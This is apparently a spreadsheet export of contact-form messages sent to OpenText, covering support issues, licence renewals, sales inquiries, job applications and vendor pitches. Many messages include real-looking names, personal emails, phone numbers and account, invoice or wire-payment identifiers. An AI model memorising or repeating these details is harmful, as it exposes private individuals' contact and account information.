    <t>Greetings from Euro Obesity 2019!Allied Academies takes the boundless privilege to invite each one of you to the 5th International Conference on Obesity and Weight Management being held at Dublin, Ireland on June 19-20, 2019. We are organizing a conference where business, academia and associations are contributing existing proficiency &amp; collaborating to develop subject knowledge and accelerate innovations in the field of Obesity Reduction.</t>
  </si>
  <si>
    <t>I am a South Korea National police officer. _x000D_
a few days ago, _x000D_
I submitted my application by email to take your exam Ence. _x000D_
(your email address : EnCaseCertification@opentext.com )_x000D_
but I did not receive your reply yet._x000D_
Please check your email  _x000D_
and send a reply my email(my email address : whitemint@police.go.kr) _x000D_
as soon as possible. Thank you</t>
  </si>
  <si>
    <t>We are looking for one product related to Document management system and to implement the same we required small discussion. So please do the needful at the earliest.</t>
  </si>
  <si>
    <t>I am a Third Year student from DLSU taking BS Computer Science, I found this company through a list provided by DLSU and I would like to apply for an internship if you would let me</t>
  </si>
  <si>
    <t>Having query please contact +917568597353</t>
  </si>
  <si>
    <t>Helllo, currently im a Senior developer in hp extream 9.0 working in Argentina for PDA Peugeot / ATOS. I think that im the best programming in HP Extream 9.0 I can solve all problems, dinamic tables with sections or levels, time composition issues, datafile xml, delimited. Etc. I work with customers from Europe, UK, Spain, SU, France, Poland. In my countre i not have opportunities for progress about this technology, my dream is continue working with Hp extream remote for another country gain a better salary, and if its possible pick a capacition in Opendialogue. Ill would be a good human resourse for you if give me a opportunity. Best regards, thanks for your time._x000D_
linkedin: esteban-mauricio-romero-53823b15a/</t>
  </si>
  <si>
    <t>There is an error in our Brava application " An exception occurred attempting to retrieve the viewer. Failed to retrieve a valid file cache response."_x000D_
Can you help us solve the following problem? Thank you!</t>
  </si>
  <si>
    <t>I cant acess to your security acct to send my resume</t>
  </si>
  <si>
    <t>Hi there and compliments of the season._x000D_
I am a 20 year experienced Test Analyst who is currently in the market. I found opentext online (I live in the same area) and think I can make a difference._x000D_
_x000D_
My experience at a glance:_x000D_
_x000D_
- 14 years test analyst_x000D_
- 9 years testing_x000D_
- 5 years technical writing_x000D_
- 1 year business analyst_x000D_
- 6 months project management_x000D_
- 6 months automated testing_x000D_
- 18 months development_x000D_
_x000D_
Should my experience interest you, please feel free to request my CV._x000D_
_x000D_
Thank you._x000D_
Warm Regards_x000D_
_x000D_
Louise Wilkins_x000D_
+27 (82) 568-3808</t>
  </si>
  <si>
    <t>I have made numerous tickets in the past (which some of them are still active) but I go today to the website to log another ticket and very weirdly the website says i do not have access to that!?!  Any idea what is the problem here?</t>
  </si>
  <si>
    <t>Hello. I am trying to obtain my new certificate for Encase.  My dongle ID: is V988160788.  Would you be able to assist me with this? My email is david.silva@dmv.ca.gov or my cell # is (408) 426-1751.</t>
  </si>
  <si>
    <t xml:space="preserve">We recently upgraded to laptops running windows 10 and now the installer for right fax wont install because it says dot net 4.5 is not installed.  Windows 10 uses dot net 4.7.  Help_x000D_
</t>
  </si>
  <si>
    <t>Lyft is currently vetting potential document management solutions and would like to see a demo of Opentext's offerings in this space.</t>
  </si>
  <si>
    <t>We are Looking for software/program that will (1) allow us to see all paths (folder length + Filename length) that exceed a certain amount of characters.  E.g. if character limitation is 256, and destination already has 30 characters allocated in the folder/subfolder organizational naming convention, I need to see all Paths that exceed 226 characters, so that I can abbreviate/truncate folder and file names prior to copying to my destination; and (2) has an interface which will allow us to abbreviate/truncate the excessive folder/file names, and hopefully log the renaming.  Ideally it would be great if we could mass/bulk abbreviate to 8.3 naming convention or similar, but interface which allows for find/replace in folder / file names and or addressing them one at a time will suffice. _x000D_
_x000D_
Background: _x000D_
We move thousands of files every day from files we’ve collected to our servers, and continually run across the problem where our file/folder path exceed 256 characters._x000D_
Mapping a drive for the folders paths won’t really work because we have hundreds of thousands of matters, so we can’t map a relative path for each one.  We try to keep the folder naming convention as short as possible.  _x000D_
The best off-the-shelf program I’ve found is one called ‘FileBoss’ which is pretty cheap, clunky and fidgety, and made out of some guy’s basement/garage.  But it will allow me to identify all paths (folder/filename) that exceed a certain length in both file name and folder name lengths._x000D_
So, for example, say I’m going to copy my collection of files to our server that already has 40 characters in the folder/subfolder naming conventions.  This means I want to find all folders/file paths in my collection that exceed 216 characters so that I can ‘truncate/abbreviate’ them before copying them over to the desitination that has 40 characters (folders that describe matter name, type of matter, collection source, etc) already allocated._x000D_
Programs like Robocopy will copy the offending / excessiv</t>
  </si>
  <si>
    <t>Greetings and Happy New Year,_x000D_
_x000D_
I write to inquire about a payment related to my registration for the Host Intrusion Methodology &amp; Investigation - OnDemand course.  The related invoice number is 9000843763 and a wire payment was made on 11/29/2018 for an amount of $2,495 from the RMI Government.  The tracking ID for the wire payment is 2476896.  I would really appreciate any confirmations of payment receipt.  Looking forward to hear from you._x000D_
_x000D_
cheers,</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
Hope you're doing well and Happy New Year! I wanted to reach out to you regarding a potential partnership between OpenText and Vidrovr. To provide some context, we utilize our proprietary artificial intelligence and machine learning solutions for video to help customers yield value from these types of technologies._x000D_
_x000D_
With that being said, I'd love to schedule some time to chat if you're free over the next week or two._x000D_
_x000D_
Thanks!_x000D_
Connor</t>
  </si>
  <si>
    <t>Product enquiry</t>
  </si>
  <si>
    <t>We need to discuss a prospect need for OpenText platform for one of our big Financial Services Clients. Please revert back at your earliest._x000D_
_x000D_
Thanks,_x000D_
Terry Walia_x000D_
Director - Sapient Corp_x000D_
Cell: 718-844-1298_x000D_
Email: twalia@sapient.com</t>
  </si>
  <si>
    <t>Am not able to navigate to the downloads tab am using my managers account for this purpose . The account seems to be quite different from what we had previously and it restricts our access to different parts of the application . Please reach out to me at the earliest .(Manager's email id : Gopala.kalicharan@bankofthewest.com)</t>
  </si>
  <si>
    <t>I am interested in renewing my EnCE certification.  I have taken multiple classes with OpenText.  Can you please forward me my training transcript so I can attach it to my EnCE renewal.  _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Timothy Chaffey</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am Kriestan from Elsner Technologies. We are located in Lakeland FL and partner with global company. With 12 years of experience in this industry, we have mastered the art of understanding the vision of client and delivering solutions above their expectation._x000D_
_x000D_
We provide services like Website development and maintenance, Digital Marketing, SEO, Custom software solution, Product implementation etc._x000D_
_x000D_
Our rates for development starts with $20/hr._x000D_
_x000D_
Feel free to reply me so we can discuss in detail._x000D_
_x000D_
Thanks, _x000D_
Kriestan_x000D_
Skype:sales.elsner</t>
  </si>
  <si>
    <t>I can't get in to my support account. When I log in it says that I no longer have access. Have had an account for years. Renewed on 12/5/18. There's a link to click for email confirmation. Went through that and still no access. Help! Thanks.</t>
  </si>
  <si>
    <t>Buenas  tardes  podría marcarme para realizar una cotización porfavor  o  aun esta Mario Romero, el me atendío hace un año</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to open ticket logged into portal. _x000D_
Could you provide me with installation instructions which includes how to backup the database? Also, will Rightfax Server 16.4 work on Windows 2016 Server or just Windows 2012?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
Just want to follow up with my email from last week, i got a user that received a new laptop and would like to have OpenText Exstream transferred from his old laptop to the new one._x000D_
Please advise._x000D_
_x000D_
My reporting director is Jason Tong._x000D_
Thanks,_x000D_
Rammil Gatchalian </t>
  </si>
  <si>
    <t xml:space="preserve">I'm Joaquin Armengot, an experienced Spanish sailor and i´m preparing my new ocean sailing project “A solo adventure to live as a team” for which I´m looking for funding, consisting of 3 years of preparation, with hard training and solo regattas on a boat of 6.5 meters long (and 200 m2 of advertising surface), making more 3000 nautical miles to qualify and compete in the regatta of the Atlantic crossing "Minitransat 2021": a regatta from France to the Caribbean making stopover in the Canary Islands, more than 4000 nautical miles of solo navigation with only a GPS and some nautical charts. A challenge within the reach of few athletes._x000D_
That´s why I get in touch with OPENTEXT as I´m sure it will be of interest to you as a sponsorship or CSR with activities that the brand want to do because it´s a very flexible project that be able to arrange to the needs of the company._x000D_
If you need something else, don´t hesitate to ask me._x000D_
Thank you._x000D_
Greetings,_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I was wondering if i can get some guidance as to what may be causing "Transmission Errors" for incoming faxes. There are three specific vedors that send us faxes that we are receiving faxes with "transmission errors". When opening the fax document, there are a usually one to two pages that show up blacked out. Usually these instances can be handled by us calling the vendor requesting for them to re-fax the document but run into problems when the blacked out pages contain the patient information that the vendor requests. </t>
  </si>
  <si>
    <t>Cannot Generate Product License Key</t>
  </si>
  <si>
    <t>Sierra Wireless is a long-time customer of GXS/OpenText as users of your EDI platform.  We are currently considering multiple new initiatives leveraging the GXS EDI platform and I wish to inquire about your Managed Services offerings for EDI development and/or support.  We currently have an on-prem instance so I would like to evaluate your services under two scenarios - one where you support and develop our on-prem instance, and one where we move to a hosted/cloud service managed by you (assuming that's on offer)._x000D_
_x000D_
Thanks,_x000D_
Jeff Comba_x000D_
Sr Mgr, Data Systems_x000D_
Sierra Wireless</t>
  </si>
  <si>
    <t>Want to understand solutions/capabilities of Opentext</t>
  </si>
  <si>
    <t>I'm looking to see if you sell direct to customers or if you only sell through resellers? My Asia region is interested in your RightFax product in our Singapore office. If you do not sell direct, do you have a list of authorized resellers that can sell your RightFax product in Singapore?</t>
  </si>
  <si>
    <t>Explore content management solution at group level</t>
  </si>
  <si>
    <t xml:space="preserve">test2 </t>
  </si>
  <si>
    <t>We are interested in setting up Fax to Email for our office. Looking for pricing and information on the process.</t>
  </si>
  <si>
    <t>We are looking for a high speed composition tool which also allows client interaction (such as changes to letters).  Not sure that I am inquiring about the correct software package with this request.</t>
  </si>
  <si>
    <t xml:space="preserve">Please email white list our domain:  (HeidelbergEngineering)_x000D_
We have tried to email the following people at OpenText (ldanilen@opentext and mmathers@opentext) to discuss maintenance renewals and your email server drops our emails thinking we are spam.  </t>
  </si>
  <si>
    <t>Good Afternoon_x000D_
_x000D_
I wondered if you could help me. We are currently looking into the possibility of implementing a contract management system. _x000D_
_x000D_
We are looking for a system that has the ability to:_x000D_
_x000D_
-   upload, store, and view PDF files of contracts. _x000D_
-  Allow input of additional information alongside the contract as well as being able to filter and sort information._x000D_
-  Store and categorise contracts_x000D_
-  Store additional files/ attach emails etc to supplier contracts_x000D_
-  Input notes _x000D_
-  Upload precedents and auto-generate contracts after input of information_x000D_
-  Ability to track active litigation matters and deadlines_x000D_
-  Ability to search through text of uploaded files_x000D_
_x000D_
Please can you tell me what sort of cost your services would be and if you would be able to fulfil any of our criteria listed above?_x000D_
_x000D_
Kind regards_x000D_
_x000D_
Katie White</t>
  </si>
  <si>
    <t>Hi, I need to know if, in order to get a quote for the renewal of some licences of the product Guidance Encase that we have, you need to know the licences' serial numbers or if the licenes' expiration date is enough. _x000D_
Thank you very much._x000D_
Best regards,_x000D_
Antonio Romano</t>
  </si>
  <si>
    <t>We are a bank, and will be installing a new commercial loan system over the following months.  We will be exchanging EDI files with manufacturers, which would be the 850 purchase order and the 810 invoice.  Open Text was mentioned by one of our business partners as an EDI file exchange service provider.  _x000D_
_x000D_
Do you have expertise in this arena, and are you interested in exploring this opportunity with BOK Financial?  Please email or call today.  Thanks, Brad</t>
  </si>
  <si>
    <t>Need technical support with an install.</t>
  </si>
  <si>
    <t>Unable to login to Open Text Active Catalogue. User ID is R7223A but when I click 'Login' it does not load.</t>
  </si>
  <si>
    <t>Do you offer any kind of payment plan for your passport training access? This is for personal training not related to my company.</t>
  </si>
  <si>
    <t>Need a contact for an RFP</t>
  </si>
  <si>
    <t>PAYPAL*MYUS.com_x000D_
PP10MYUS@gmail.com/</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
 _x000D_
I hope you don’t mind me contacting you, but I am emailing you to see if you would be interested in signing up to our Business Ticketing Scheme at Reading Football Club. _x000D_
By joining the scheme, we want to build a partnership with you which will help and support your business.  _x000D_
_x000D_
A brief outline of the scheme:_x000D_
_x000D_
-	You can select 3 Reading FC home league fixtures in the 2018/19 season giving your organisation access to discounted tickets, starting from as little as £2! _x000D_
_x000D_
-	For every ticket sold a percentage of the money will be returned to you as a way of fundraising._x000D_
_x000D_
-	There is no obligation to attend every fixture and there is no minimum amount you need to reach, but the more who attend the higher the rewards! _x000D_
_x000D_
-	Entry into our Incentive Scheme which includes the chance of being rewarded with some of the following fantastic prizes:_x000D_
_x000D_
•	Hospitality for the lead contact_x000D_
•	Half price Hospitality Box _x000D_
•	Discounted Stadium Tour tickets_x000D_
•	£50 bonus towards your funding_x000D_
•	Free Matchday Tickets and much more! _x000D_
_x000D_
We will provide marketing material and all your employees need to do is phone our Ticket Office when one of your chosen fixtures are on sale. _x000D_
_x000D_
If you would like to sign up to the scheme or if you have anymore questions please do not hesitate to contact our Group Ticketing team on 0118 968 1313-option 3 or by emailing groupticketing@readingfc.co.uk _x000D_
_x000D_
We look forward to speaking to you soon. _x000D_
</t>
  </si>
  <si>
    <t>Need to know how to port an existing electronic fax number from another provider to my existing Easylink (Fax2Mail) account.</t>
  </si>
  <si>
    <t>Solution Gov/Fed price quote.</t>
  </si>
  <si>
    <t>Discuss Teleform application and gauge appropriateness and feasibility of this solution for scanning paper surveys into an Excel or Access database.</t>
  </si>
  <si>
    <t>Explore</t>
  </si>
  <si>
    <t>Auskunft über SAP DMS-Lösung für japanischen Kunden in Düsseldorf (Europa Headquater) und ggf. global. Bitte um Rückruf, nachdem dies nun der 3. Versuch ist._x000D_
Mit freundlichen Grüßen_x000D_
Hans Engelke</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning, _x000D_
_x000D_
We are currently updating our records and noticed we do not have a W9 on file for this company.  Please send us an updated copy. _x000D_
_x000D_
_x000D_
Thanks _x000D_
</t>
  </si>
  <si>
    <t>We are looking forward to adopting mBPM tool for our organization.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to either have a new invitation code sent or help fixing account, new to the system and cannot log in to submit invoices , please and thank you </t>
  </si>
  <si>
    <t>Hi! I can't access my Support tickets. I get this message:_x000D_
No Access_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
_x000D_
BR_x000D_
Torbjorn Blid</t>
  </si>
  <si>
    <t>Dear Sirs,_x000D_
_x000D_
We are a spanish MS Dynamics 365 Gold Partner, interested on contacting a spanish partner of yours with experience integrating eDocs with Dynamics 365._x000D_
_x000D_
Can you please address me to them?_x000D_
_x000D_
Thank you very much_x000D_
_x000D_
Best regards</t>
  </si>
  <si>
    <t xml:space="preserve">To unlock the iCloud </t>
  </si>
  <si>
    <t>When I log in to the opentext platform, and click on "My Support" i get this: _x000D_
"No Access_x000D_
_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
_x000D_
_x000D_
Almost there!_x000D_
_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
"_x000D_
Then when I click on the link in the email and type in my login credetials again, I get the same again. _x000D_
Same happens for my colleague Thomas Pressler, thomas.pressler@alphabet.com. _x000D_
Please check our accounts. _x000D_
Regards_x000D_
Sabine</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs,_x000D_
_x000D_
my name is Anton Greil and I work as a chartered engineering consultant for telecommunications and media. In february I will hold a training about computer forensics. In this course I would like to do some exercises with the students in EnCase like performing searches (file level and byte by byte), recovering deleted files and partitions, viewing disk geometry and reporting. Is there a possibility to get a (time)limited license of EnCase for this purpose?_x000D_
_x000D_
Best regards_x000D_
Anton Greil_x000D_
</t>
  </si>
  <si>
    <t>On sales.. please reach out to us</t>
  </si>
  <si>
    <t>We have OptenText Exceed 15 in use. The current release is version 15.0.0 which we have installed. I have now learned that this is a Service Pack 5. Where can I download this?</t>
  </si>
  <si>
    <t>Request to have Access to the Knowledge Base of OpenText to search for documentation._x000D_
(Beganet is part of the Coca-Cola European Partners group)</t>
  </si>
  <si>
    <t>We are not using Covisint anymore. Please delete out organization profile.</t>
  </si>
  <si>
    <t>We are not using Covisint anymore. Please deactivate our organization profile.</t>
  </si>
  <si>
    <t>Need to get in contact with the Office in Copenhagen. Phone is not available when called on the number stated on this website for the office.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I hope you’re having a great week. I’m reaching out to introduce our company to you because we thought you might need our testing services in your software development process._x000D_
_x000D_
QATestLab, based in Ukraine, is one of the world’s top providers of independent QA and software testing services and has offices Ukraine, UK, US, India, Israel and Cyprus. We have 20+ different types of software tests, 200+ QA engineers, 300+ customers  and 3000+ project experience. We are working with Bosch, Shell, Yandex, G5 Games, Gameforge, Playtika, Jolka and many more big companies and tech startups giving assistance to their Web, Games, Cloud, IOT, AR, VR, Mobile and other software development processes. Our customers benefit in terms of allocated time and money resources as well as the quality of the service they recieve by outsourcing their testing needs to us._x000D_
_x000D_
We think our services will take you one step further in your business. If you feel interested, we would love to offer you a 20 hour trial test for free. Please let me know if you have any questions and feel free to check our website for more information._x000D_
_x000D_
I would like to share our company presentation with you. Looking forward to hearing from you soon. Have a great week ahead!_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
-- _x000D_
_x000D_
Süleyman Başkan_x000D_
Sales Manager - EMEA , QATestLab_x000D_
suleyman.baskan@qatestlab.eu_x000D_
Skype : suleymanbaskan_x000D_
Phone: +90 538 570 6666_x000D_
İçerenköy Mah. Şakirbey Sok. No:2 D:14 Ataşehir İstanbul_x000D_
</t>
  </si>
  <si>
    <t>we need to send RFP for email archiving system and need to know the contact person for such issue</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings,_x000D_
_x000D_
I run a small design agency in Iasi, Romania. We're currently developing a digital product for a client and he is also in need of scanning, digitizing and sorting a warehouse full of documents. _x000D_
_x000D_
I have stumbled upon you and after checking your work/product on te web I figured that maybe you can help me fulfill this task. I want to know if your product can provide not just the OCR conversion but also template recognition of documents and if it can sort the scanned documents into a digital library/database?_x000D_
_x000D_
Please respond with an offer. _x000D_
_x000D_
Looking forward to hearing from you,_x000D_
Alexandru Calinica </t>
  </si>
  <si>
    <t>Hi There, I have a customer called ICON Holdings who have some OpenText requirements for a new site and might have an exiting account,  can you confirm if Data#3 can resell Opentext SQLBase?</t>
  </si>
  <si>
    <t>AAA內容AAA</t>
  </si>
  <si>
    <t>AM</t>
  </si>
  <si>
    <t>Hello, we have two renewals for Mid North Coast Local Health District (March 2019 and June 2019). Is there any chance we could please have a renewal quote for these?</t>
  </si>
  <si>
    <t>I am not able to access My Support Page._x000D_
I have requsted for MySupport Access. I have even verfied my Account after getting an email from OpenText to verify. After successful verification, Still I am getting the same page while trying to access My Support page.</t>
  </si>
  <si>
    <t xml:space="preserve">To create or make invoices </t>
  </si>
  <si>
    <t xml:space="preserve">Wondering if your applications and solutions apply to government opportunities and if you have a government partners in Washington State. </t>
  </si>
  <si>
    <t>My account logs in but cannot access support to open/view tickets. I tried reconfirming email but still no support access. should be like Tomas Bernabe from Prime Healthcare. Please let me know if there is anything I  need to do.</t>
  </si>
  <si>
    <t>Hello, my name is Ritchie Singh and I am the Upper Year Professional Development Chair for the Masters of Information Student Council. I would like to invite you to take part in our in our employer showcase this year to network with upcoming graduates and aspiring information professionals._x000D_
_x000D_
We would love to OpenText at the Faculty of Information._x000D_
_x000D_
Thursday, January 24th, 2019_x000D_
10:30 AM to 5:30 PM_x000D_
(Organizations May Stay As They Long Are Able To)_x000D_
Faculty of Information _x000D_
Inforum - 4th floor_x000D_
University of Toronto, Claude T. Bissell Building_x000D_
140 St George Street, M5S 3G6_x000D_
_x000D_
Your organization does not have to be hiring at the moment to take part in this event (if you are, that is an added bonus). The Employer Showcase is intended to introduce students to a wide variety of organizations that could potentially find value in one of our many concentrations: such as information systems and design, archives and records management, user experience, library and information science, and knowledge management. Take a look here for more information._x000D_
_x000D_
Career Networking Format -  The first portion of the event will feature a_x000D_
more formal tabling setting where your organization can showcase your work and materials. At the second portion of the event, we encourage organizations to move away from their tables to make use of the Inforum space to enjoy some food, take a new LinkedIn photo with our professional photographer, and mingle with organizations and students to have more informal conversations._x000D_
_x000D_
Contact Information - This event is hosted by the Master of Information Student Council’s Professional Development Committee. If you have any questions about the event please email me -ritchie.singh@mail.utoronto.ca or alex.howes@utoronto.ca_x000D_
_x000D_
__________________________________________________x000D_
Ritchie Singh_x000D_
Hon., B.A., MIS KMIM (2019)_x000D_
Upper Year Chair - Professional Development MISC_x000D_
University of Toronto - Faculty of Information</t>
  </si>
  <si>
    <t>Qfiniti Software for Multinational company</t>
  </si>
  <si>
    <t>GY</t>
  </si>
  <si>
    <t>Seeking initial information on automating accounts payable/invoice entry</t>
  </si>
  <si>
    <t xml:space="preserve">I write to you to opt out of all forms of communication. </t>
  </si>
  <si>
    <t>Good day! Would like to ask if the hiring for billing coordinator is still open. I am imterested in applying for the said position. Hoping for your feedback.</t>
  </si>
  <si>
    <t>We(Infosys Lyd) have been using Rightfax Services for past 5 years under the login InfoSys3 . In the new web interface we are not able to see the complete listings of assigned numbers and their e-mail associations. Can you help with this as we need to make some modifications in the current mappings ._x000D_
Thanks_x000D_
Chandan</t>
  </si>
  <si>
    <t xml:space="preserve">I need a job  please </t>
  </si>
  <si>
    <t>Dears, we would like to deal with Open Text for right fax implementation so please send us pre-sales contact number.</t>
  </si>
  <si>
    <t>Team,_x000D_
I am not able to open a support ticket. Kindly help me in this regard.</t>
  </si>
  <si>
    <t>I wish to call my subscription._x000D_
My name is bill Meyer_x000D_
My email is.  bmeyer@meyertv.com</t>
  </si>
  <si>
    <t>I have had a fax number with you and it is no longer needed I wish to cancel it. The number is 404-418-7001</t>
  </si>
  <si>
    <t>I'm interested in pricing for RightFax for a hybrid or managed deployment.</t>
  </si>
  <si>
    <t xml:space="preserve">Notice_x000D_
</t>
  </si>
  <si>
    <t>Notice</t>
  </si>
  <si>
    <t>Interested in the Business Development Roles you have.</t>
  </si>
  <si>
    <t xml:space="preserve">Wish to establish the campus relationship with "Opentext". Look forward your support for the mutual benefits. </t>
  </si>
  <si>
    <t>TV</t>
  </si>
  <si>
    <t>Request for Developer Lic and Looking for Sales Partner</t>
  </si>
  <si>
    <t>Would be interested in being a vendor in your ecosystem</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Guidance Software Staff,_x000D_
_x000D_
          I am a Coordinator of the Global Social Enterprise Summit, an inaugural conference on social entrepreneurship that will take place on March 22-24, 2019 at UCLA and organized by the strategic insights group, the premier mission-driven consulting firm in Los Angeles, California. _x000D_
        We are looking for sponsors for this conference. I am asking you to please provide me with the right person's contact information that can provide information on sponsorships. Looking forward to hearing from you! _x000D_
_x000D_
Sincerely,_x000D_
-Syuzanna_x000D_
_x000D_
_x000D_
_x000D_
Syuzanna Abrahamyan | Associate _x000D_
818-984-6164 | _x000D_
</t>
  </si>
  <si>
    <t>Cancel subscription - account number US01104005</t>
  </si>
  <si>
    <t>Application</t>
  </si>
  <si>
    <t>Need to urgently speak with HR department regarding former employment.</t>
  </si>
  <si>
    <t xml:space="preserve">OpenText Information Extraction Service (IES) for SAP Solutions - Interested in understanding main features and costs._x000D_
_x000D_
Volume around 15,000 individual invoices per year.  Each Invoice can contain anywhere from a single line item up to 500 line items.  So multiple pages per invoice is not uncommon.  Majority of what we receive for AP invoices comes in the form of a paper copy which can be scanned to PDF.  Looking for options to be able to take a PDF Invoice version and automate to covert and save as an SAP Parked Invoice.  </t>
  </si>
  <si>
    <t>Good afternoon, I got a user that received a new laptop, i would like to get his Exstream license transfer from the old laptop to the new laptop._x000D_
What will be the best way to make this happen?_x000D_
_x000D_
My director is Jason Tong, Messagepoint. _x000D_
_x000D_
Thanks,_x000D_
Rammil</t>
  </si>
  <si>
    <t>I can not access the software download site,  EY Ecuador has bought 2 perpetual EnCase licenses and I need to download the software.</t>
  </si>
  <si>
    <t>I handle vendor management and would like to get a copy of our MSA/User Agreement/License Agreement.</t>
  </si>
  <si>
    <t>Billing - we received a notice stating that we are in arrears from July.  We have not yet implemented Open Text.  However, we are interested and would like to reset our contract to begin January 1, 2019.  Kindly reply.</t>
  </si>
  <si>
    <t>I am trying to get documentation on how to perform a factory reset on GGWT00490, Modular Fax Gateway 1T1/E1 SIP/T.38</t>
  </si>
  <si>
    <t>Need assistance with dongles not being recognized.</t>
  </si>
  <si>
    <t>Looking into details of the Records Management Software for managing electronic records.</t>
  </si>
  <si>
    <t>My OpenText support account will not allow me to raise tickets as it needs me to verify my email address._x000D_
I have "activated" my email address 5 times and I am still unable to raise tickets or access the license key activation tools._x000D_
I am currently trialing and due to the online portal not working I am unable to activate the license through the online support portal.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
I just wanted to whether you provide free or demo service so we can test it on our end?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We received the following email and we do not wish to renew our services at this time.  We have tried to log in to our accounbt but have been unsuccessful thus far.  Please contact us to discuss._x000D_
_x000D_
Thank you,_x000D_
Theresa A. Dillon_x000D_
_x000D_
Dear , _x000D_
Your Hightail (formerly YouSendIt) Pro Plus subscription will automatically renew on January 13, 2019. _x000D_
To cancel this automatic renewal or to update your credit card and other details, please sign in to your account. _x000D_
_x000D_
Regards _x000D_
- The Hightail Team _x000D_
 _x000D_
_________________________________________x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi opentext! _x000D_
_x000D_
I'm reaching out in hope to discuss company’s server infrastructure with your IT department. We are an IBM business partner and would like to help with any server upgrade needs you may have now or for future projects. What is the best way to get in contact with your IT department? _x000D_
_x000D_
Happy new year, _x000D_
_x000D_
Kyle Campbell_x000D_
</t>
  </si>
  <si>
    <t>Password reset link is not working. Can't access account to submit a support ticket for an issue we are having.</t>
  </si>
  <si>
    <t>We have an EnCase license registered to DHSCSIRT@dhs.wisconsin.gov. I am wondering what the status of our registration is, when it is due and how much the renewal will cost. I am told our license may have expired._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Mike</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in hearing more about your invoice management solution </t>
  </si>
  <si>
    <t>Accés à My Support</t>
  </si>
  <si>
    <t>I cannot access opentext portal for Encase licence registration. I've confirmed my e-mail but the error I get states: "Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us."</t>
  </si>
  <si>
    <t>Our acct#734499 has old street address of 44427-B West Ann Arbor Rd _x000D_
BUT NEW ADDRESS is 44623 Five Mile Road...The city and zip are the same_x000D_
I did not see how to change this on this account.</t>
  </si>
  <si>
    <t>Billing Issue on Fax2Mail service</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Hope you are doing well._x000D_
_x000D_
Just curious to know if you would be interested in SAP user?_x000D_
_x000D_
•	SAP S/4HANA_x000D_
•	SAP CRM (Customer Relationship Management)_x000D_
•	SAP ERP (Enterprise Resource Planning)_x000D_
•	SAP PLM (Product Lifecycle Management)_x000D_
•	SAP SCM (Supply Chain Management)_x000D_
•	SAP SRM (Supplier Relationship Management)_x000D_
_x000D_
Do you see any see any additional opportunity in acquiring an opt-list of above mentioned professionals for your marketing and demand generation program?_x000D_
_x000D_
Please let me know (if you have any other requirement) your interest so I shall get back to you with the volume of unique leads available with us._x000D_
</t>
  </si>
  <si>
    <t>Need a VAN provider for EDI transactions with JPMC</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in establishing a direct EDI connection (interconnect) with OpenText.  We are a supplier for JCP and I understand we can connect directly with JCP through OpenText. Please contact me via email to discuss further. If you could send me the details of how we can directly connect with Opentext and any fees for this please send the information. Warmest Regards, Kathleen </t>
  </si>
  <si>
    <t>I am Senior CAD Manager at Dashiell we primarily use MicroStation and AutoCAD. I have about 80 Professional Engineers that need digital signatures for their electronic seals. We need digital signatures for the PDFs. An engineer can seal anywhere from 10 to 1000 drawings at a time. We print the PDFs dozens of sets of various size(Full size and reduced).</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
_x000D_
I’m sure you know only too well that when you’re building relationships with your clients or colleagues, the key to success is getting to know their likes and dislikes, and what makes them tick. Understanding and accepting the differences between the people you work with isn’t just good on an individual level, it can help improve both client and staff relationships too._x000D_
_x000D_
At Nespresso Professional, we realise the importance of individuality and diversity – which is why I wanted to let you know about our 4 different ranges and 13 types of fresh coffee capsules that you can choose from. _x000D_
_x000D_
Each of our coffees has its own flavour profile and distinct aroma - from our intense and spicy Ristretto Origin India, or our light and refreshing Espresso Leggero, to a Caramel or Vanilla blend. There’s a flavour for everybody to enjoy – from the canteen to meeting rooms, or your Directors office._x000D_
_x000D_
We have a variety of bespoke business packages available, tailored to suit your needs and budget._x000D_
_x000D_
If you would like to trial our quality coffee, please don’t hesitate via email or on 07901 788 687, to arrange an appointment._x000D_
_x000D_
I look forward to hearing from you. _x000D_
_x000D_
Best wishes,_x000D_
_x000D_
Danny Harkin_x000D_
</t>
  </si>
  <si>
    <t>I tried sending e-mail to credit.control@opentext.com but never got a reply i sent the e-mail on 13th Desember_x000D_
_x000D_
Hey_x000D_
_x000D_
Im contacting Open Text on behalf of the Norwegian Police Academy and i was wondering if it was possible to get a invoice of all purchases for your software over the last 3 years if this is possible.</t>
  </si>
  <si>
    <t>Want to find out about certifications related to VIM.</t>
  </si>
  <si>
    <t>Hi, I am from Application Support Team working for Documentum applications. I need access full access to downloads for respective mail id. For any further information, please contact me. Thank you!</t>
  </si>
  <si>
    <t>Busy with S4 implementation.  Want to explore Open Text initially for document extraction from legacy systems with possible view to use Open Text for ECM after Go-Live. _x000D_
Need to know whether we can utilise the extraction and archiving function without purchase the full package up front?_x000D_
Regards</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested in our newly updated “IT Security Industry Professionals Email List” for your sales and marketing initiatives? If so let me know your thoughts._x000D_
_x000D_
